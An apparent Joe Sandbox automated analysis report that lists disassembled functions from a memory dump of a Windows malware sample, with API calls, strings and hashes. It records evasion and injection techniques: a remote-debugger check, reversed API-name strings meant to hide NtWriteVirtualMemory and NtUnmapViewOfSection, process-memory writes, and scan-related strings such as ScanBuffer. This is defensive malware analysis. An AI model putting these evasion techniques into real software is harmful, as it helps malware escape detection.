lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E65C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E65C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E65C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E65CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E65CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E65CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E65CEB

Strings

Software\Borland\Delphi\Locales, xrefs: 02E65B38
Software\Borland\Locales, xrefs: 02E65AFC, 02E65B1A

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 3c14eb29dc6cbec2f391f6734a9bed9ca1165bf574947270b57627676bc1114f
Instruction ID: bed1e146198926d4ae6d58c400d7336167a2a8252f52faf5a9de5fbbe21a79f4
Opcode Fuzzy Hash: 3c14eb29dc6cbec2f391f6734a9bed9ca1165bf574947270b57627676bc1114f
Instruction Fuzzy Hash: FD519571BC025D7AFB21D6A48C4EFFF77AD9B047C4F8091A1BA08E6181DB749A449F60

Function 02E7894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,UacScan), ref: 02E78960
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E7897A
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize), ref: 02E789B6

Part of subcall function 02E77D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E77DEC

Strings

bcrypt, xrefs: 02E7895F
BCryptVerifySignature, xrefs: 02E78973

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 393a169d52eaa69cc42fd13efc7fc61ce8d61ba4787d14b1a5409b723b0cd0a4
Instruction ID: 559d385ae1447991a44a194ac65f3c4abe67276eee3e484fdbc815316e9d6da8
Opcode Fuzzy Hash: 393a169d52eaa69cc42fd13efc7fc61ce8d61ba4787d14b1a5409b723b0cd0a4
Instruction Fuzzy Hash: 16F0FF70AC0304DEEB90A76AB84CF67B7AC9391714F405929B90C8B144C2B41C908B50

Function 02E7F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02E7F754
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E7F766
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E7F77D

Strings

KernelBase, xrefs: 02E7F74F
CheckRemoteDebuggerPresent, xrefs: 02E7F760

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 0660eb77788358bb9a4d6e1deafb4129ebe958e8b4fc85d108f6834f2f4d143c
Instruction ID: d94bd6b1f3adb6ecbe8ee80cedd2c1abc26e467399cca86d7608996d54ec77c5
Opcode Fuzzy Hash: 0660eb77788358bb9a4d6e1deafb4129ebe958e8b4fc85d108f6834f2f4d143c
Instruction Fuzzy Hash: 60F0A770994248BAEB10A7B888887ECFBA95B05328F249394E435625C1E7750640CA51

Function 02E7DD70 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E64F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E64F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E7DE40), ref: 02E7DDAB
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E7DE40), ref: 02E7DDDB
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E7DDF0
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E7DE1C
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E7DE25

Part of subcall function 02E64C60: SysFreeString.OLEAUT32(02E7F4A4), ref: 02E64C6E

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: f65ab1a814eefb03b73bc06ea299b74d62557a0768b316d571b4b76f3cb3230a
Instruction ID: e7743acd81e0254b3569d1f3f9c44e81f0a2cfcb5ff67ac687d08cdc8c1be9be
Opcode Fuzzy Hash: f65ab1a814eefb03b73bc06ea299b74d62557a0768b316d571b4b76f3cb3230a
Instruction Fuzzy Hash: 5C21C175AC0309BAEB51EAD4CC56FDE77BDEB48700F505461B600F71C0DAB4AA059BA4

Function 02E7E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E7E5F6

Strings

Initialize, xrefs: 02E7E4E6
OpenSession, xrefs: 02E7E598
ScanBuffer, xrefs: 02E7E53F

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 98fe4e802d5c1ca760e6169db9e8c7d69538ebc641d3e18501033328bc2f3fab
Instruction ID: b1f1600c67b01c009c22a41c99c94cfb626bee730a6506d95ce89f2b634a42bf
Opcode Fuzzy Hash: 98fe4e802d5c1ca760e6169db9e8c7d69538ebc641d3e18501033328bc2f3fab
Instruction Fuzzy Hash: 51412135BC01099BEB21EBA4D845EEEB3FAEF89740F60E465F041A7291DA70AD018F55

Function 02E7DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02E64F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E64F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E7DD5E), ref: 02E7DCCB
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E7DD05
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E7DD32
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E7DD3B

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 650641e99ecdfd4c01168b99579bc376d9ea1f9d2d36b95c02845ca57dd5d4ac
Instruction ID: e1e5136442c70e8e653a919a1795d0712ae4208e25cf0c6e2d0e6fbe5c4e9a45
Opcode Fuzzy Hash: 650641e99ecdfd4c01168b99579bc376d9ea1f9d2d36b95c02845ca57dd5d4ac
Instruction Fuzzy Hash: 3821E071AC0209BAEB20EAD0CD56FEEB7BDEF05B40F619561B600F75C0D7B06A049B64

Function 02E77A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E77A9F

Strings

ntdll, xrefs: 02E77A74
yromeMlautriVetacollAwZ, xrefs: 02E77A47

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: b7944f35696d8fa0d88669c47bae9bd43ee2b46d50c65a051dfa84362905a463
Instruction ID: 7b142c6918734ee22f869db2d03bc92fba1199bb0bbd562554fd7ed52d104b05
Opcode Fuzzy Hash: b7944f35696d8fa0d88669c47bae9bd43ee2b46d50c65a051dfa84362905a463
Instruction Fuzzy Hash: 67112D756C0208BFEB14EFA4DC45EAEB7AEEB49700F91A461B904D7640E630AA50CB64

Function 02E77A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E77A9F

Strings

ntdll, xrefs: 02E77A74
yromeMlautriVetacollAwZ, xrefs: 02E77A47

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: f5c207c3b1ef565d94e2bbd094486eba2df0d64e60160b9e9bb9920e0d8c87c8
Instruction ID: d04598c4181d0ad96e038ff5094ffee60f9ef547fb5c7189106f26913854a440
Opcode Fuzzy Hash: f5c207c3b1ef565d94e2bbd094486eba2df0d64e60160b9e9bb9920e0d8c87c8
Instruction Fuzzy Hash: 90112D756C0208BFEB14EFA4DC45EAEB7AEEB49700F91A461B904D7640E630AA50CB64

Function 02E78400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E78471

Strings

ntdll, xrefs: 02E78448
yromeMlautriVdaeRtN, xrefs: 02E7841B

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: 58ec93e2d25d031781a02a530dffc17b52d6a94af8b66690cb163468bfc86584
Instruction ID: dc065f81d873e2aee0bdac9a818fc4a88e4b4d343cce74636a4c5958ff36e904
Opcode Fuzzy Hash: 58ec93e2d25d031781a02a530dffc17b52d6a94af8b66690cb163468bfc86584
Instruction Fuzzy Hash: 66018C746C0308EFEB50EFA8EC49EAAB7EEEB49700F51D420F904D7240E670A940DB20

Function 02E77D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E77DEC

Strings

Ntdll, xrefs: 02E77DC3
yromeMlautriVetirW, xrefs: 02E77D93

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: dcff500738fd12943a15d9904bb8f4f11415ea25c1c79746cc47916f9c873c68
Instruction ID: 2d39ea3be2b2762e36eae9cf91aa307bf65c67b16939920b1a03250b92c1adde
Opcode Fuzzy Hash: dcff500738fd12943a15d9904bb8f4f11415ea25c1c79746cc47916f9c873c68
Instruction Fuzzy Hash: 22014C756C0208AFDB50EF98EC46E9AB7EDEB49B00F50E864B904DB640D630AD50CB64

Function 02E78670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02E786D5

Strings

ntdll, xrefs: 02E786B8
noitceSfOweiVpamnUtN, xrefs: 02E7868B

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: 11901e32a8ca82a49c7c008a224b3c9a0ad9def78e056cc17928b96206f924ec
Instruction ID: 6d44230c1406ab31d40a6a364252657131cbc377633086e98a38cb480adeef69
Opcode Fuzzy Hash: 11901e32a8ca82a49c7c008a224b3c9a0ad9def78e056cc17928b96206f924ec
Instruction Fuzzy Hash: 97018F34AC0204AFEB10EFA4DC49A6AB7AEEB59B40F91E460F400D7640D630A940DB24

Function 02E7DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlI.N(?,?,00000000,02E7DC7E), ref: 02E7DC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC61

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Path$DeleteFileNameName_
String ID:
API String ID: 4284456518-0
Opcode ID: ee28776228414725576f848d19c0d5c4117e6abe7faef43b1d328d7b2d735dcd
Instruction ID: 5fe9f4ce313078f8cbd7a313e047362322ccbbc90d1dc3c1bb39fd76299c2b41
Opcode Fuzzy Hash: ee28776228414725576f848d19c0d5c4117e6abe7faef43b1d328d7b2d735dcd
Instruction Fuzzy Hash: 540162759C42086EEB05DBA08D51FCD77B9AF45704F51A4D2A200E6081DBB4AB048B25

Function 02E7DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E64F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E64F2E

RtlI.N(?,?,00000000,02E7DC7E), ref: 02E7DC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC61

Part of subcall function 02E64C60: SysFreeString.OLEAUT32(02E7F4A4), ref: 02E64C6E

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: PathString$AllocDeleteFileFreeNameName_
String ID:
API String ID: 1530111750-0
Opcode ID: c82dcf04d95d47bf9a07cff49e094c92cb187d627ad865cc3f77bfe22f9d866e
Instruction ID: 7f0c06fac6b660c0c4e0020a00d8bb8a60fb45c472593270bd14752b75cef525
Opcode Fuzzy Hash: c82dcf04d95d47bf9a07cff49e094c92cb187d627ad865cc3f77bfe22f9d866e
Instruction Fuzzy Hash: ED01F47198020CBEEB11EBE0DD56FDDB3BDEF49700F5194A1F605E2580EBB46B048A64

Function 02E76DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02E76D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02E76DB9,?,?,?,00000000), ref: 02E76D99

CoCreateInstance.OLE32(?,00000000,00000005,02E76EAC,00000000,00000000,02E76E2B,?,00000000,02E76E9B), ref: 02E76E17

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 3775be3b5836d822c08ef953648adb294e402b05ac34e5bcae719b27254209dd
Instruction ID: 58caa71857061bf31c019f8c9991a2d0f4a9e90853ae6bf658b9a9cf5073ba64
